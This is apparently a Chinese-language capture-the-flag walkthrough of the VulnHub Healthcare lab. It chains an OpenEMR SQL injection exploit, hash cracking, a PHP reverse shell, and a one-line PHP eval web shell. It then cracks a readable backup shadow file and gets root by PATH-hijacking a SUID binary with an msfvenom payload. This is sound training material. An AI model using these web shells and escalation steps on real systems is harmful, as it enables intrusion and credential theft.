VulnHub - Healthcare

信息收集

端口扫描

Port	Service	Version
21/tcp	ftp	ProFTPD 1.3.3d
80/tcp	http	Apache httpd 2.2.17 ((PCLinuxOS 2011/PREFORK-1pclos2011))

21/tcp open  ftp     ProFTPD 1.3.3d
80/tcp open  http    Apache httpd 2.2.17 ((PCLinuxOS 2011/PREFORK-1pclos2011))
| http-robots.txt: 8 disallowed entries 
| /manual/ /manual-2.2/ /addon-modules/ /doc/ /images/ 
|_/all_our_e-mail_addresses /admin/ /
|_http-server-header: Apache/2.2.17 (PCLinuxOS 2011/PREFORK-1pclos2011)
|_http-title: Coming Soon 2

Web 路径枚举

gobuster dir -u "http://192.168.0.106/" -t 60 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -b 403,404 -o report/output/gobuster_80.txt

/index                (Status: 200) [Size: 5031]
/images               (Status: 301) [Size: 342] [--> http://192.168.0.106/images/]
/css                  (Status: 301) [Size: 339] [--> http://192.168.0.106/css/]
/js                   (Status: 301) [Size: 338] [--> http://192.168.0.106/js/]
/vendor               (Status: 301) [Size: 342] [--> http://192.168.0.106/vendor/]
/favicon              (Status: 200) [Size: 1406]
/robots               (Status: 200) [Size: 620]
/fonts                (Status: 301) [Size: 341] [--> http://192.168.0.106/fonts/]
/gitweb               (Status: 301) [Size: 342] [--> http://192.168.0.106/gitweb/]
/openemr              (Status: 301) [Size: 343] [--> http://192.168.0.106/openemr/]

可以正常访问的页面

http://192.168.0.106/openemr/

漏洞发现(Sql Injection)

• OpenEMR 4.1.0 - ‘u’ SQL Injection

漏洞利用(Sql Injection)

searchsploit -m 49742

需要配置 exploit 的 url 连接

admin:3863efef9ee2bfbc51ecdca359c6302bed1389e8 
medical:ab24aed5a7c4ad45615cd7e0da816eea39e48c95d

Hash Crack

• CrackStation

3863efef9ee2bfbc51ecdca359c6302bed1389e8    sha1    ackbar
ab24aed5a7c4ad45615cd7e0da816eea39e48c95d   Unknown Unrecognized hash format.

得到密码：admin:ackbar

Reverse Shell

php-reverse-shell.php: /usr/share/webshells/php/php-reverse-shell.php

config.php: http://192.168.0.106/openemr/interface/main/main_screen.php?auth=login&site=default

监听本地端口，替换 config.php 的内容为 php-reverse-shell.php 的内容，并保存

Connect C2

为了方便操作，连接到 phpsploit

echo '<?php @eval($_SERVER["HTTP_PHPSPL01T"]); ?> ' > shell.php

访问 shell.php

http://192.168.0.106/openemr/sites/default/shell.php

后渗透

信息收集(系统内)

枚举脚本：privilege-escalation-awesome-scripts-suite

user.txt

etc_passwd

# cat /etc/passwd | grep -v "nologin\|false\|shutdown\|true"

root:x:0:0:root:/root:/bin/bash 
bin:x:1:1:bin:/bin:/bin/sh 
daemon:x:2:2:daemon:/sbin:/bin/sh 
adm:x:3:4:adm:/var/adm:/bin/sh 
lp:x:4:7:lp:/var/spool/lpd:/bin/sh 
sync:x:5:0:sync:/sbin:/bin/sync 
halt:x:7:0:halt:/sbin:/sbin/halt 
mail:x:8:12:mail:/var/spool/mail:/bin/sh 
news:x:9:13:news:/var/spool/news:/bin/sh 
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh 
operator:x:11:0:operator:/var:/bin/sh 
games:x:12:100:games:/usr/games:/bin/sh 
nobody:x:65534:65534:Nobody:/:/bin/sh 
mysql:x:492:488:system user for mysql:/var/lib/mysql:/bin/bash 
medical:x:500:500:PCLinuxOS Medical:/home/medical:/bin/bash 
apache:x:479:416:system user for httpd-conf:/var/www:/bin/sh 
almirant:x:501:502:Almirant:/home/almirant:/bin/bash

Backup(配置错误)

/var/backups 中 shadow 文件存在可读权限

备份与原件时间差距不大，很可能存在未修改的密码

密码爆破

将 passwd 和 shaodw 分别保存到文件

shadow

# cat shadow | grep '$2a'

root:$2a$08$wPYBq0XIaBcaAtB.kZf14OXgKVDZISmTeTABJeuXJIc23qpCHA8Ay:18472:0:99999:7::: 
medical:$2a$08$N.K1aryaJfAtVMkYBo1mL.abpbhvU8CIB7UEmcs7dwoRea0trRak.:15274:0:99999:7::: 
almirant:$2a$08$jpHCGVP/yn1MFwRlkKmJMuHISxiOflP4EAgZIbtrCcfnXngNTZh3y:18472:0:99999:7:::

整理到 passwd.txt

unshadow passwd shadow > passwd.txt

root:$2a$08$wPYBq0XIaBcaAtB.kZf14OXgKVDZISmTeTABJeuXJIc23qpCHA8Ay:0:0:root:/root:/bin/bash 
medical:$2a$08$N.K1aryaJfAtVMkYBo1mL.abpbhvU8CIB7UEmcs7dwoRea0trRak.:500:500:PCLinuxOS Medical:/home/medical:/bin/bash 
almirant:$2a$08$jpHCGVP/yn1MFwRlkKmJMuHISxiOflP4EAgZIbtrCcfnXngNTZh3y:501:502:Almirant:/home/almirant:/bin/bash

john passwd.txt -w=/usr/share/wordlists/rockyou.txt 

almirant:skywalker
medical:medical

权限提升

信息收集(提权准备)

切换到普通用户

su almirant

SUID Binary

使用枚举脚本或下面的命令

find / -perm -u=s -type f 2>/dev/null

发现可疑 SUID 二进制文件，strings 后找到可利用程序

# cat suid.txt | grep "Unknown SUID binary" 

-rws--x--x 1 root       root        63K Jan 23  2010 /usr/bin/sperl5.10.1 (Unknown SUID binary) 
-rwsr-xr-x 1 root       root       120K Nov 28  2010 /usr/bin/wvdial (Unknown SUID binary) 
-rwsr-xr-x 1 root       root        29K Dec 28  2010 /usr/bin/pumount (Unknown SUID binary) 
-rwsr-xr-x 1 root       root        39K Dec 28  2010 /usr/bin/pmount (Unknown SUID binary) 
-rwsr-xr-x 1 root       root       362K Jan 18  2011 /usr/bin/gpgsm (Unknown SUID binary) 
-rwsr-xr-x 1 root       root        11K Jun 11  2011 /usr/sbin/fileshareset (Unknown SUID binary) 
-rwsr-xr-x 1 root       root       5.8K Sep 22  2011 /usr/bin/Xwrapper (Unknown SUID binary) 
-rwsr-sr-x 1 root       root       5.7K Jul 29  2020 /usr/bin/healthcheck (Unknown SUID binary)

SUID Binary 提权

# strings /usr/bin/healthcheck

/lib/ld-linux.so.2 
__gmon_start__ 
libc.so.6 
_IO_stdin_used 
setuid 
system 
setgid 
__libc_start_main 
GLIBC_2.0 
PTRhp 
[^_] 
clear ; echo 'System Health Check' ; echo '' ; echo 'Scanning System' ; sleep 2 ; ifconfig ; fdisk -l ; du -h

生成 exploit

msfvenom -p linux/x86/exec CMD=/bin/sh -f elf -o clear

上传到目标

phpsploit(192.168.0.106) > upload /home/ayu/AkProject/VulnHub/Healthcare/exploit/clear_exp /dev/shm/clear 

添加可执行权限

chmod +x /dev/shm/clear

设置 PATH 环境变量

export PATH=/dev/shm:$PATH

运行

/usr/bin/healthcheck

root.txt